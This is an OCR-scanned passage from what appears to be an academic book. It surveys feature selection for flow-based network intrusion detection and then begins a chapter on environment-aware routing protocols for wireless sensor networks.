are grouped in terms of flow buckets. Then later, NIDS analyzes specific 
fields of these flow buckets. This approach suits high-speed network having 
extensive size network traffics [3]. This approach is the new one and has 
attracted researchers for the past few years. The two desirable features of 
IDS are Speed and Accuracy [4]. 


5.2 IP Flows 


The capturing of IP flows has many significant benefits; hence, all vendors 
provide their routers with flow monitoring measuring facilities. An IP flow 
is captured and stored in flow records, used for traffic characterization [5]. 
Netflow is Cisco’s propriety technology. 

The definition of IP flow given by IPFIX (IP Flow Information Export) 
is “a set of IP packets passing through an observation point in the network 
during a particular interval of time. Moreover, all packet clusters to a par- 
ticular flow have a set of common properties”. 

According to IPFIX (Internet Protocol Flow Information Export) doc- 
umentation, a flow is identified by parameters like source address, desti- 
nation addresses, source port number, destination port numbers, and IP 
protocols: 


(ip_src, ip_dst, port-src, port_dst, proto) 


These elements are called flow keys or common properties. These flow 
keys are essential for getting behavior of network [6]. 
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5.2.1 The Architecture of Flow-Based IDS 


A Metering Process is in charge of collecting packets at Observation Points, 
filtering them out (if necessary), and aggregating data about them. Using 
the IPFIX protocol and Exporter this data is sent to a Collector, as shown 
in Figure 5.2 [6]. 

The flow inspects a group of packets flowing through the network. This 
gives IDS the aggregated view of network traffic. As a result, the amount of 
data required for comparison get substantially reduced [7]. Flow export- 
ing and flow collection are the two phases in the flow monitoring process. 
A packet is provided to the flow collector after it is captured by the flow 
exporter, usually called flow records [8]. The flow collector must obtain 
flow records from the flow exporter and store them in an analytically valu- 
able format. By aggregating packets from the same flow, we may look for 
unusual traffic patterns that may indicate an attack [9]. 


5.2.2 Wireless IDS Designed Using Flow-Based Approach 


The wireless network is more complicated than the wired one. Both technol- 
ogies face different situations while dealing with security. That's why wired 
IDS could not be used in wireless environments. To support the 802.11 
environment, the industry has been working for several years on hardware 
and software used in the wireless network. The Wired Equivalent Policy 
(WEP) was one attempt with a number of flaws in its security mechanism, 
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Figure 5.2 Architecture of IP flow flow-based IDS [6]. 
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Figure 5.3 Flow-based wireless intrusion detection systems [10]. 


and industry works very hard to solve the issue associated with WEP. 
This results in the introduction of WPA (Wi-Fi Protected Access) 128-bit 
encryption security mechanism. One of the major problems associated 
with a wireless network is detecting a rough access point in the network. 
Figure 5.3 depicts the working of a flow-based wireless intrusion detection 
system. Here, Sniffer is connected with the WIDS central administration 
system, which captures packets from wireless environments and sends 
them to WIDS. This system stores network packets in flow record format 
using five-tuple information, i.e., source and destination IP address, source 
port number, and destination port number, and protocol used. Later, these 
flow records are analyzed to detect malicious activity in the wireless envi- 
ronment [10]. 
In order to protect the wireless network, one should know: 


¢ Locations of all Access Point Planted in your network 

e Set of action to be taken for an unauthorized access point 
(rough access point) detected within your network 

e ‘Total users accessing your wireless network 

e Unencrypted information read or exchanged by such users. 


5.2.3 Comparison of Flow- and Packet-Based IDS 


Packet-based IDS or Traditional IDS are no longer helpful for today’s 
high-speed network; flow-based IDS can substitute for packet-based ones. 
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However, they lack accuracy. The main advantage of a flow-based IDS is 
that it works on fewer amounts of data than the packet-based approach. 
So, flow-based IDS require fewer resources. However, the scarcity of data 
affects the accuracy of the flow-based IDS. The flow-based IDS gives 
reduced alert confidence and more false alarms. The encryption tech- 
nology has no impact on flow-based IDS, which is generally found with 
packet-based IDS. The flow-based approach does not deal with payload, so 
there is no privacy issue as with the packet-based approach [11]. 


5.3 Feature Engineering 


Feature engineering exploits domain knowledge of the data to create fea- 
tures that make machine learning algorithm work efficiently. In other 
words, it is the method of formulating the only acceptable options given 
the information, the model, and also the task. Automated feature learning 
will obviate the need for manual feature engineering. The next buzzword 
after big data is feature engineering, and it involves both selection and 
extraction of features. Feature selection is a method by which a subset of 
specific features is selected for model constructions. It is an optimization 
problem. Nowadays, we can get high-dimensional data everywhere, e.g., 
document, text, brain MRI, images, microarray data, time-series data, vid- 
eos, security logs, etc. Generally, feature selection is required in classifica- 
tion, clustering, and regression tasks [12]. 

A feature is nothing but a piece of the numeric representation of raw 
data potentially helpful for prediction. A simple model can beat a com- 
plex model if good features are provided. Features and model sit between 
raw data and the desired insights, as shown in Figure 5.4. Not only does 
model building play an essential role in a machine learning workflow, 
but so do feature choices. This is a two-jointed lever, and which one you 
choose affects the other. The preceding modeling steps are made easier by 
valuable features, and the resulting model is more capable of achieving the 
desired task. The perfect and straightforward features are essential to the 
job for the model to interpret. The number of features is also essential for 
the machine learning model’ efficiency. If there are not enough insightful 
features, the model will not complete the final mission. The model would 
be more costly and difficult to train if there are too many features or insig- 
nificant ones. Anything may go wrong during the training phase, causing 
the model’s performance to suffer [13]. Feature selection is used to select 
valuable features, data mining to generate rules using these features, and 
ML classifier to detect the various attack. The main principle of feature 
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Figure 5.4 Feature engineering in machine learning workflow [13]. 


selection is to select the feature to the point (selecting only relevant fea- 
tures as per the purpose). 


5.3.1 Curse of Dimensionality 


The concept of the curse of dimensionality problem can be understood with 
the help of Figure 5.5. Initially the feature set contains zero attributes with 
no classification power. As we started adding the number of features in the 
features set for any model under observations, the model's classification 
power also increases to a limit. However, after reaching an optimal number 
of features, adding further features starts dropping its classification power. 
The reason behind this is that the feature set may contain many irrele- 
vant and redundant features. The feature space increases exponentially 


Classifier performance 


Optimal number of 


0 
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Figure 5.5 Curse of dimensionality [14]. 
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as the number of features increases. In the space it occupies, information 
becomes increasingly sparse. Sparsity makes it hard for any approach to 
achieve statistical significance [14]. For the sake of understanding, let’s say 
you lost your 10 Rs coin on a 150-meter line. How do you search for it? Just 
walking on that line. However, what if your coin is lost on 150*150 square 
meter cricket ground? Now it is tough to roam around the ground search- 
ing for the coin. The next level, (assume) what if the ground is 150*150*150 
cube meters, equivalent to a thirty-story-high building. How will you find 
the coin? As the dimension increases, the search problem gets worse. In 
machine learning, more features may give more information but might not 
lead to better classification power. 

When you have a large number of features, a large search space is 
required, and searching may take a long time depending upon the algo- 
rithm you choose. With limited training examples, you cannot work with 
many features because it leads to overfitting. When you have too many 
features, this will lead to the learning algorithm’s degradation and more 
computational time. This phenomenon is called a curse of dimensionality. 
Feature engineering is the solution to overcome the curse of dimensional- 
ity problem. Feature Engineering constitutes: 


1. Feature Selection: The procedure for selecting a small set of 
set features from the initially available feature set. 

2. Feature Extraction: In the case of feature extraction, you 
may get some new features that may not be a part of the 
initially available feature set. For example, a feature set may 
contain the length and breadth of a particular unit; these two 
features can be reduced with the area as the new feature. 


Feature Engineering has the following advantages [15]: 


1. Redundant and irrelevant features degrade the ML algo- 

rithm’s performance; feature selection improves the data 

quality and increases the resulting model's accuracy. 

Difficulty in interpretation and visualization. 

The computation may become infeasible. 

Curse of dimensionality. 

Reduces time complexity: less computation increasing algo- 

rithm speed. 

6. Reduces space complexity: fewer parameters at the end 
require less storage. 

7. Save the cost of observing the feature. 


Ot ete 
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5.3.2 Feature Selection 


Feature selection is a method by which a subset of specific features is 
selected for model constructions. It is an optimization problem. Feature 
selection is useful in a variety of situations, including data mining, classifi- 
cation, and object recognition. It has been effective in eliminating unnec- 
essary and redundant features from the original dataset [16]. 


5.3.3. Feature Categorization 


The feature set’s reduction is based on the usefulness and redundancy 
of the feature concerning the objective. A feature can belong to any one of 
the following categories [17]: 


1. Strongly Important: For an optimal feature subset, a strongly 
important (relevant) feature is always required; it cannot be 
excluded without affecting the original conditional target 
distribution. 

2. Weakly Important, but not redundant: For an optimum sub- 
set, a feature may not always be essential and may be based 
on some conditions. 

3. Unimportant: It is not necessary to include the unimportant 
(irrelevant) features at all. 

4, Duplicate/Redundant: Duplicate or redundant features are 
those that are poorly related but can be replaced entirely by 
a group of other features so that the target distribution is not 
disturbed. 


5.4 Classification of Feature Selection Technique 


There are various approaches for feature selection, some of which are 
depicted in the following Figure 5.6. All approaches covered in this chap- 
ter are mutually inclusive; one feature selection technique can come under 
two categories. 


5.4.1 The Wrapper, Filter, and Embedded Feature Selection 


Filter Methods: A filter feature selection method assigns a score to each 
feature using the statistical measure. The feature ranked by the score is 
either accepted or declined to be included from the dataset. The methods 
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Figure 5.6 Classification of feature selection. 


regarding the dependent variable are often univariate and consider the fea- 
ture independently. Information Gain, Chi-Squared test, Correlation coef- 
ficient scores, LDA, and PCA, are examples of filter-based feature selection 
methods. As the filter method evaluates individual features, a feature that 
is not useful cannot provide a significant performance improvement when 
taken with others. 

Wrapper Methods: A wrapper technique selects a set of features, where dif- 
ferent combinations are prepared, evaluated, and compared to other com- 
binations. A set of functions is evaluated, and scores are assigned based on 
accuracy using predictive models. Forward selection, backward elimina- 
tion, recursive feature elimination, and genetic algorithm are examples of 
the wrapper method. The wrapper method's limitation is that this method 
is computationally expensive compared to the filter method. A subset of 
features selected through the wrapper method makes the model more 
prone to overfitting. 
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Embedded Methods: An embedded method predicts which features sig- 
nificantly improve the model's accuracy while the model is being built. 
Decision tree, LASSO, Elastic Net, and Ridge Regression are some exam- 
ples of embedded methods. This method combines the filter and wrapper 
method. 


5.4.2 Correlation, Consistency, and PCA-Based Feature 
Selection 


Correlation-Based Feature Selection (CFS): In CFS, features positively 
correlated are expected to be relevant for classification. Otherwise, they 
are not. As already mentioned, features are redundant if they are closely 
correlated and contain similar information. CFS is based on the idea that 
a vital feature subset contains features positively associated with the class 
but not with each other. As a result, CFS calculates the degree of associ- 
ation between features while also assessing predictive ability. It includes 
linear correlation-based models, e.g., PCA, IPA, ICA, and nonlinear cor- 
relation-based models, e.g., ISOMAP, LLI, etc. 

Consistency-Based Feature Selection: Full consistency means zero incon- 
sistency. The inconsistency rate over the data given set of features is the cri- 
terion for consistency-based feature selection. If two sets of values match 
all attributes but have different class labels, they are inconsistent. 

Principal Component Analysis: PCA treats instances of specific data sets 
as vectors of p-dimensional space, with P denoting the number of attri- 
butes per instance. PCA’s basic idea is to transform the given data set into 
a Q-dimensional space, with Q<P, i.e., into a set of linearly uncorrelated 
variables named principal components, maintaining roughly the same 
information in the original space. 


The working principle of correlation-based feature selection (CFS) is 
that features within a class are highly correlated. Features are redundant if 
they are closely related. It calculates the degree of correlations. It includes 
linear correlation-based models, e.g., PCA, IPA, ICA, and nonlinear cor- 
relation-based models, e.g., ISOMAP. 


5.4.3 Similarity, Information Theoretical, Sparse Learning, 
and Statistical-Based Feature Selection 


The similarity-based feature selection method evaluates the importance of 
features by their capacity to preserve data similarity. A good feature should 
not randomly assign values to data instances. A good feature should assign 
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similar values to each other. The closeness is calculated with the help of the 
data similarity matrix. It uses Laplacian score, Fisher Score, Trace ration 
criterion for finding closeness of feature. 

Informational theoretical exploits different heuristic filter criteria to 
measure the importance of the feature. It divides features as strongly rel- 
evant, weakly relevant non-redundant, weakly relevant redundant, and 
irrelevant. Entropy, conditional entropy, information gain, etc., are some 
of the measures are used to divides features into four groups. 

The selected features of the method, as mentioned earlier, may not be 
optimal for a particular learning task. The sparse learning-based process 
is an embedded method with several advantages like empirical success in 
many real-world applications, strong theoretical guarantee, and a flexible 
model for complex feature structure. Lassoes, an extension to the multi- 
class or multivariate problem, multi-cluster feature selection are examples. 

Algorithms use the different statistical measures under this category 
for calculating feature importance. Most of them are filter-based meth- 
ods. Most of the algorithm evaluates features individually, so the features 
redundancy is inescapable. Some algorithms can handle only discrete data. 
T-score, chi-square measures are used in this category. In a computer net- 
work, it is assumed that internet traffic at the network layer has statisti- 
cal properties peculiar to some groups of applications, allowing users to 
differentiate them from one another using a statistical-based recognition 
method. The statistical characteristics include the minimum and maximum 
packet inter-arrival times and the standard deviation of packet length. The 
qualitative analysis of different features helps researchers choose one or 
more features to classify network traffic flows. A weight value could be 
assigned to each feature to represent its importance. Many features are 
used to classify network traffic, but using unrelated or redundant features 
often negatively impacts most ML algorithms’ accuracy. It can make the 
system computationally expensive since the amount of information stored 
and processes also improve. Therefore it is suggested to select only an 
important set of features [18]. 


5.4.4 Univariate and Multivariate Feature Selection 


Univariate feature selection looks for each feature independently of oth- 
ers. Examples of univariate feature selection are the Pearson Correlation 
Coefficient, Chi-square, F-score, Signal to noise ratio, Mutual information, 
etc. It ranks feature by importance, and users determine ranking cut-off. 
The univariate method measures some correlation between two random 
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variables, e.g., the Pearson Correlation Coefficient. Multivariate Feature 
Selection considers all features simultaneously. 


5.5 Tools and Library for Feature Selection 


We have some readily available software tools for feature selections with 
machine learning algorithms; libraries integrated within the tools. Some of 
the widely used tools include WEKA, MATLAB, ROSE2, and ROSETTA 
[19]. The researchers have also used the library like SCIKIT, CARET [20], 
and DEAP [21]. 


5.6 Literature Review on Feature Selection 
in Flow-Based IDS 


Current internet connections to high-speed networks produce traffic in the 
gigabits per second range, necessitating rigorous analysis to understand 
network traffic activity at the packet level. To minimize packet analysis, 
aggregated network traffic information is currently interpreted in the form 
of flows. Hence the flows supply information and pattern about the traffic 
instead of packet analysis. A flow-based approach seems to be more prom- 
ising since it is more scalable in increasing network speed [22]. Improving 
the intrusion detection system's performance has been considered difficult 
due to the volatility, incompleteness, and redundancy in the voluminous 
network traffic pattern in a flow-based dataset. These underline the neces- 
sity of feature selection in IDS to identify the informative features and 
overlook the irrelevant or redundant features that degrade the IDS’s per- 
formance in computational complexity and detection rate [23]. Accuracy, 
reducing computation time, and false alarm rate are the key issue to be 
addressed properly for classifying the data. 

It is not always sufficient for all features in a dataset to lead to improved 
IDS performance. Hence, preprocessing on the dataset before going to the 
detection phase plays an important role. In the preprocessing phase, feature 
selection is an important stage. Feature selection is the process of select- 
ing the most important features applicable to a specific attack or malicious 
conduct. In machine learning, redundant or noisy data make it difficult 
to discover meaningful patterns from the dataset. Feature selection, also 
known as attribute selection, helps in many ways to improve performance 
and generate better results [24]. 
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Gayatri et al. [17] used a feature reduction approach for the flow-based 
IDS using the J-Rip classification algorithm on CICIDS2017 datasets. The 
actual dataset has 86 features, which were reduced to 18 features for appli- 
cation-layer DDoS attacks. This reduced 18 feature set provides good accu- 
racy (99.93%) compared with all 86 features (99.91%). These reductions 
in feature size also reduced the model built-up time from 4.17 seconds to 
0.38 seconds. 

Ammar Alazab et al. [25] mentioned that many researchers do not 
understand the importance of feature selection before applying the clas- 
sifier. However, now it has been proved through many researches that 
use of feature selection before classifiers improves classifier performance 
reducing resources required. For a multi-classification approach, feature 
selection plays an important role. Abuadlla Yousef et al. [26] presented 
two-stage neural network-based flow IDS. The first stage gives important 
features for malicious traffic classification (feature preparation module). 
These reduced features play a key role in attack classification into normal 
and abnormal traffic. The conclusion of this work is the feature selection 
assists in improving IDS performance. 

Mahendra Prasad et al. [27] presented a novel intelligent system of 
feature selection by combining a rough set with Bayes Theorem to build 
an intrusion detection system. In this system, core features are identified 
and ranked based on estimated probabilities. These estimated probabil- 
ities help to remove redundant features in the training phase to reduce 
the training complexity. Here the rough set theory is helpful to distinguish 
uncertain information. Here records are divided into three categories, 
namely normal, intermediatory and abnormal. Bayes theorem is applied to 
intermediary or unseen samples to make a firm decision. The CICIDS2017 
dataset was used to evaluate the system. The proposed system feature count 
is reduced to 40, providing an accuracy of 97.95% with precision and recall 
of 96.37%. The system’s main drawback was that manual intervention was 
needed to decide the range of estimated probabilities of relevant and irrel- 
evant features. The preprocessing work was also done manually. Tanya 
Garg et al. [28] attempted to reduce the number of the features using ten 
different classification algorithms to get the features and then ranking fea- 
tures according to its importance. After this, 15 top features are selected to 
get better performance. These features are extracted using Boolean AND 
operator of top six classification algorithms. In [29] proved that system 
performance also gets reduced by considering redundant features, e.g., 
attack detection accuracy is decreased with increase in overload. 

Chaouki and Saoussen [30] proposed a wrapper approach-based feature 
selection method. Genetic algorithm (GA) and logistic regression (LR) are 
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used in the wrapper approach for the most relevant feature selection. A 
genetic algorithm is used as a search strategy for representing the possible 
feature subset. Moreover, logistic regression is used as a predictor in the 
wrapper. The authors used the KDD99 dataset and the UNSW-NB15 data- 
set for experimentation. The most relevant feature set accuracy is tested 
using three decision tree classifiers, C4.5, RandomForest, and NBTree. The 
proposed approach provides high classification accuracy and lowers the 
false alarm rate. The proposed approach showed a good detection rate for 
Denial of Service attack with 99.98%. 

Sumaiya et al. [31] suggested an IDS model for classification based on 
chi-square feature selection and multi-class SVM. The authors suggest a 
chi-square feature selection method based on rank. The NSL-KDD dataset 
was used to test the proposed method. A mixture of discrete and contin- 
uous features is selected using the proposed feature selection process. The 
proposed model achieves high detection rates and low false alarm rates 
with selected features due to the parameter tuning technique, optimiz- 
ing gamma, and over-fitting SVM parameters. The proposed model also 
decreased training and testing time significantly. 

Akashdeep et al. [32] proposed a feature reduction method for IDS to 
improve performance. The proposed system used information gain and 
correlation methods for ranking features. The proposed system combined 
features obtained from information gain and correlation to differentiate 
useful and useless features. The KDD99 dataset is used for training and 
testing the proposed system. The intrusion detection system is imple- 
mented using a neural network. The proposed Intrusion Detection System 
with a reduced feature set showed better performance, increased detection 
rate, and reduced false alarm rate than the system without feature reduc- 
tion. The proposed model showed a 99.93% detection rate for DoS attacks. 

Madbouly et al. [33] proposed lightweight IDS with a feature selection 
method. The proposed system used the KDD99 dataset. The proposed 
system used a correlation-based feature subset selection (CFS) evaluator 
with seven different search methods Best first, Evolutionary search, Rank 
search (gain ratio), Rank search (info gain), PSO search, Greedy stepwise, 
and Tabu search. The proposed method selected the 12 most relevant fea- 
tures from 41 features. The proposed model's performance with 12 features 
reported the same performance 99.95% as with 41 features. The proposed 
system achieved the same detection accuracy with a higher True Positive 
Rate, lower False Positive Rate, and lower False Negative Rate. 

ZHANG Xue-qin et al. [34] demonstrated an IDS dependent on high- 
light determination and SVM in which an element choice is made on the 
premise Fisher Score. They utilized the SVM as a classifier. The Fisher Score 
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is joined with the SVM to choose the significant features. They brought 
three parameters into the record, such as Precision, Detection Rate, and 
False Positive Rate. They selected features for system blended attack and 
single attack mode for feature selection, and out of 41 features, 29 features 
are significant. For the assessment, they utilized KDD Cup 99 dataset for 
intrusion detection. In this dataset, the attack like DoS, Probe, U2R, R2L, 
and so forth are available. 

Shang Lei [35] introduced a component choice strategy dependent on 
Information Gain and Genetic Algorithm in which content classification 
includes choice technique dependent on data gain with the recurrence of 
things. The author demonstrated that this element choice strategy could 
understand the issue of content classification. 

Preeti Aggarwala and Sudhir Kumar Sharma [36] performed a detailed 
study on the NSL KDD data set concerning four classes: Basic, Traffic, 
Content, and Host data attributes categorized. They analyzed the result for 
Detection Rate and False Alarm Rate for IDS. NSL KDD having 42 attri- 
butes classified under four classes. Basic has nine attributes: content having 
13 attributes, traffic having nine attributes, and Host having ten attributes. 
The KDD data set was classified, and 15 variants were created by combin- 
ing all four classes. Random Tree classification algorithm and WEKA tool 
used for analyzing. The result showed a basic class with a high Detection 
Rate (81%), whereas the Host class had a Low False Rate (8.5%). 

Vandna and Anurag [37] proposed the implementation of the decision 
tree algorithm with K-means on IDS. The authors evaluated the perfor- 
mance of two decision tree algorithms J48 and ID3. The attribute reduc- 
tion was performed on the NSL-KDD dataset. Out of 41 original attributes, 
only nine attributes were selected in preprocessing, and classification algo- 
rithms are implemented. Dimension reduction played an important role in 
the performance evaluation of J48 and ID3 algorithms. The result showed 
J48 performed better for reduced dimensionalities. 

The value of using feature selection methods in IDS was suggested by 
Krishan et al. [38]. One of the most challenging aspects of developing effec- 
tive IDSs is dealing with large amounts of data with numerous features. The 
authors proposed several feature selection methods and graded them using 
InfoGain, GainRatio, RELIEF OneR, etc. The authors used the J48 classi- 
fier to assess the performance of the best algorithms by combining features 
from the best algorithms. KDDCup99 data set was examined to evaluate 
proposed techniques. OneR and RELIEF, two newly proposed feature 
selection algorithms, are compared to existing feature selection algorithms 
such as SVM, OneR, Chi-square, Relief, GainRatio, Information Gain, and 
others in order to choose the best features. Their findings revealed that the 
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proposed FS approach decreases training time while increasing accuracy. 
The proposed FS algorithm reduced 70.73% of the feature dimension space 
and roughly 60% of the training time, increasing classification accuracy 
from 61.39% to 66.80%. 

The author of this article used Genetic Algorithms (GA) with Principal 
Component Analysis (PCA) for feature selections [39]. Here PCA is used 
only for feature transformation purposes. After this, normalized features 
are fed to GA for feature selection. The Decision Tree (DST) is used as 
a classifier for this experimentation. This hybrid model of PCA-GA-DST 
reduced the CICIDS2017 dataset’s features to 40 features with an accuracy 
of 99.53%. In another work [24], a feature of the CICIDS2017 dataset is 
selected based on their classifications’ performance. Here one feature from 
the dataset is deleted at a time, and accuracy, model build-up time, and test 
time is recorded. If deletion of the feature causes the reduction in accu- 
racy and increase in the build time and test time, that feature is considered 
important. Using this approach, 15 features are identified as important, 
which gives good accuracy compared to all feature accuracy. 


5.7 Challenges and Future Scope 


The issue with IDS is that it must cope with ever-faster network speeds. It 
is difficult for packet-based IDS to keep up with such fast network traffic. 
The flow-based IDS can solve this problem of packet-based IDS. Increasing 
alert confidence, reducing false alarms, and reducing resource consump- 
tion are still open issues for the IDS researchers. 

Only some portion of the current research work has focused on flow- 
based IDS, and still, many researchers are working on packet-based IDS 
despite understanding the need for flow-based IDS. Hence significantly less 
information is available about meaningful flow features and their capacity 
to classify network traffics. In the case of flow-based IDS, some researchers 
do not understand the importance of data cleaning. If we correctly under- 
stand our data, we can reduce some of the features before actual feature 
selections start. In CICIDS2017 [40], dataset features like source IP address, 
SourcePortNumber, DestinitionIP, FlowID are network-specific features to 
remove such features beforehand in the data cleaning process. While work- 
ing with feature selection in IDS, each researcher has used a different por- 
tion of different datasets. However, while comparing the results, datasets 
need to be the same across all the works. The choosing of feature selection 
algorithms must consider simplicity, feature reduction capacity, stability, 
scalability, accuracy, storage requirement, and algorithm's computational 
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efficiency. The tradeoff between feature selections and feature extractions 
also needs to be taken care of. With the feature selection, we select the only 
subset of features. Hence it may be possible that some of the information 
may be lost. 

Nevertheless, feature extractions take care of this. The choice between 
feature selection and feature extraction depends on the domain of the 
application under consideration. The use of bio-inspired algorithms for 
feature selections has increased a lot in the last few years. These algorithms 
are categorized under three groups, viz. evolutionary, ecology-based, and 
swarm-based. With a bio-inspired algorithm, one may be good at accuracy, 
but the computational time required is more. Also, setting up algorithmic 
parameters like the number of generations and the number of iterations 
takes time. The referred literature shows that anticipating an ideal number 
of features to enhance IDS accuracy and decrease training time complexity 
continues to be an open issue. Data correlation is the future of IDS. The 
future IDS will deliver results by analyzing input from various traces. 


5.8 Conclusions 


There is a rapid advancement in network technology, which is manifested 
in higher-speed networks. There is also a rise in the number of internet 
users. All this results in a huge amount of data flowing through a network 
(it can be considered big data), which burdens the IDS. The packet-based 
approach compares each and every packet so packet-based IDS cannot be 
used in high-speed networks. In this scenario, flow-based IDS is the prom- 
inent solution to this problem. The use of the feature selection technique 
with flow-based IDS helps reduce resource optimization with improved 
accuracy. In this study, the authors have also gone through various feature 
selection approaches used for flow-based IDS. This study showed how the 
reduced number of features could significantly save computational time 
and storage of a system with better accuracy than earlier. 
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Abstract 

Wireless Sensor Network (WSN) is one of the emerging technologies in the 21st 
century due to its growing demand in automation. WSNs are organized in a large 
environmental area and there are more chances for the sensor nodes to get affected 
because of external temperature. As the environmental temperature rises, the life- 
time, quality of service and temperature of sensor nodes are easily influenced. Thus 
Environmental Aware Thermal (EAT) routing protocol is introduced to minimize 
the issue. In this protocol, the incoming data signals are assigned with normal, 
abnormal and critical priority levels. It consists of three potential fields such as 
environment, energy and quality of service. The routing path is chosen in such a 
way that the critical data reaches its destination with minimum delay. Therefore, 
the path is selected depending on surrounding temperature, threshold level and 
residual energy. The network performance was analyzed in three different cases: 1, 
2 and 3. The total amount of power consumption, temperature variation, delay and 
lifetime of sensor node in all three cases are inferred. 
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6.1 Introduction 


Generally, a Wireless Sensor Network (WSN) is a distributed network 
with many sensors. It is based on wireless technology and is used to col- 
lect information from external environments like forests, flooded regions, 
agricultural land, battlefields, etc. A WSN comprises of numerous tiny sen- 
sors to monitor the area where it is being located. The collected signals are 
forwarded to the destination through intermediate nodes. A path is estab- 
lished to transmit the data from source to destination. This path is known 
as a routing path and the protocols designed to carry out this function are 
referred to as routing protocol. A routing protocol uses a predefined set of 
rules and regulations to choose a shortest path to destination from multi- 
ple available paths. An efficient routing protocol will increase the efficiency 
of a system and therefore it is considered as the heart of the communica- 
tion networking system. The common protocols used in a WSN are given 
in Fig. 6.1. 


(i) Node centric routing: In this type of protocols the destina- 
tion is identified as numeric. 

(ii) Data centric routing: In this routing, the information 
obtained from the attributes are transmitted rather than 
receiving information from other nodes. 

(iii) Source initiated routing protocols: The source node adver- 
tises that it has data to send and routing path is initiated 
from source. 

(iv) Destination initiated routing protocols: In these protocols, 
destination initiates for the routing path. 


The categories of routing protocol are single and multipath routing pro- 
tocol. Nowadays, multipath routing protocol is incorporated in wireless 


sensor networks to obtain good quality in data transmission. In the case 
of single node routing protocol, data loss between source and destination 


a 
Cate) Coa a] [a 


Fig. 6.1 Routing protocol used in wireless sensor network. 
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occurs if there is a fault in sensor node. Also, energy consumption and data 
failure rate are noticed as high in single path routing protocol. 


6.1.1 Single Path Routing Protocol 


In single path routing protocol, the connection establishment between 
source and destination are designed using a single path. This protocol esti- 
mate link quality and these links are used to determine the best optimum 
path in WSNs. Basically, this is one of the most supportive techniques 
utilized in single path routing to provide reliability [1]. All the nodes are 
connected to the node head as illustrated in Fig. 6.2. If a node wants to 
transmit the data to base station it first sends the data to the node head and 
from the node head it reaches the base station. 

Due to continuous data transmission of node head it generates more 
heat and the communication path established to base station is discon- 
nected due to node head failure as shown in Fig. 6.3. Once the link gets 
failed then there is a data loss and it cannot reach the base station. It 
becomes a life-threatening problem in case of critical data transmission. 

In a single path routing approach, a route discovery can be carried out 
with minimum resource utilization and computational complexity but it 
results in reduced throughput [2]. Additionally, reduced flexibility obtained 
as a result of this approach may significantly degrade the performance of 
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Fig. 6.2 Single path communication protocol. 
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Fig. 6.3 Communication failure due to node head heating. 


the network in critical situations. Due to limited power supply, physical 
damages and high dynamics in wireless links causes failure in active path 
link. The data packet is not forwarded and thus an alternative routing path 
is found to transmit the data continuously resulting in increased delay 
in data delivery and maximum overhead. Hence due to unreliability and 
resource constraint of wireless links, a single path routing protocol is not 
widely used in various applications [3] as it cannot meet different criteria 
performance requirement in WSNs. 


6.1.2 Multipath Routing Protocol 


The multipath routing protocols are used in different applications. They 
provide an alternative routing path if there a link failure in established 
multiple path connection between the source and the sink. The link path is 
established using hop count. Furthermore, in multihop WSNs the environ- 
mental factors, orientation, antenna shape, distance and radio interference 
vary during the entire lifetime of wireless sensor networks. All these fac- 
tors affect the link quality between the sensor nodes [1]. Consider a net- 
work with multiple routing path to reach the destination. A routing path 
established to transmit data from source to destination is as shown in Fig. 
6.4. Due to continuous data transmission, there is a node failure due to 
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Source |.” 


Fig. 6.4 Shortest path established between source and destination for data transmission. 


excess heat generation in the established routing path as depicted in Fig. 
6.5. Therefore, the communication between the source and destination is 
disconnected and data cannot reach the destination [4]. 

In multipath routing protocol the data are sent to the source and the 
source establishes a new routing path to the destination. Fig. 6.6 shows the 
reestablishment of connection to the destination through the next shortest 


Node Failure- 
Communication Stopped 


Fig. 6.5 Node failure in established routing path with data transmission loss. 
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Fig. 6.6 Data transmission through an alternative path. 


route. The main advantage of utilizing multipath routing protocol is to 
maintain uniform traffic within the network, where the data are divided 
equally among all multiple paths. As a result, the energy consumption is 
also balanced. Moreover, it increases the reliability of the system by creat- 
ing multiple copies of data packets and transmits to destination. 


6.1.3 Environmental Influence on WSN 


In wildlife monitoring applications, the performance of the network was 
observed at different days for night and daytime in different climatic con- 
ditions like summer and winter, especially in an outdoor environment. 
Thelen et al. [5] discussed the radio propagation through high humidity in 
potato deployment field. The path loss exponent value was 4 irrespective 
of different growing seasons. The radio range diminishes to 10 m as the 
potato crop starts flowering. Thus, it is necessary to deploy sensor nodes 
at a distance of at most 10 m in precision agriculture applications and a 
microclimate is sensed during the entire growing season. The influence of 
the potato foliage is found to be 17 dB, as nodes are placed at a distance of 
15 m. G. Anastasi et al. [6] suggested that rain and fog affects the perfor- 
mance of WSN especially in data transmission range and reception. The 
data transmission range of mica2/mica2dot sensor nodes is poor in the 
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presence of rain or fog. Carlo Alberto Boano et al. [7] looked into the varia- 
tions of link quality and data delivery performance at ambient temperature 
influence in low-power radio communications. The experimental result 
highlights that the communication between sensor nodes gets affected due 
to temperature and thus minimum transmission power is required at low 
temperature. 


6.2 Motivation Behind the Work 


A wireless sensor network plays a vital role in many applications such 
as health care, precision agriculture, environmental surveillance mili- 
tary, etc. A WSN must support a certain degree of reliability, energy and 
delay bound for data transportation to be utilized in these applications. 
Therefore, it is necessary to design and develop an energy-efficient proto- 
col. Apart from these factors, environmental awareness is also an import- 
ant factor that should be considered in multipath routing protocol design. 
The cost of sensor nodes is less and is deployed in large scale. These are eas- 
ily influenced by environmental factors like electromagnetic interference, 
vibration, temperature and humidity. Once the surrounding temperature 
increases, it degrades the performance of sensor nodes and excessive rise 
in temperature may damage the sensor nodes. An extreme high humidity 
environmental condition minimizes the link quality and raises the prob- 
ability of short-circuitry in sensor nodes. Similarly, a Strong electromag- 
netic interference increases the data loss rate. 

Thus the sensor nodes utilized in health care applications must with- 
stand the environmental characteristics and fluctuating channels. Besides, 
a communication protocol must be designed to maintain a bounded packet 
delivery rate (during critical stage of human) though there is a drop in 
established link. The sensor nodes deployed at the outdoor environment 
usually experience high fluctuation due to the variation in weather con- 
ditions. Thus the designed protocol must withstand variations in environ- 
mental conditions, channel fluctuations and successful data delivery. If the 
designed routing protocol does not withstand the environmental changes 
and the data packets routed through a sensor node are affected by tem- 
perature once it crosses a heat zone, data delivery through this particular 
path is terminated. In case of environment-aware routing, if the routing 
path senses extreme temperature it adjusts to an alternate routing path to 
prevent data loss. 
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6.3 Novelty of This Work 


Many researchers tried to incorporate the impact of environmental influ- 
ence into the network’s performance. But only a few of them could find 
an appropriate and reliable result for the influences of different environ- 
mental conditions. However, the main parameter degrading the network 
lifetime and quality of service is very scanty in literature and only very 
few environmental parameters like fog, moisture, humidity, and reflecting 
angle were considered. This work aims to develop an invulnerable routing 
protocol which resists an environmental impact. Thus an Environmental 
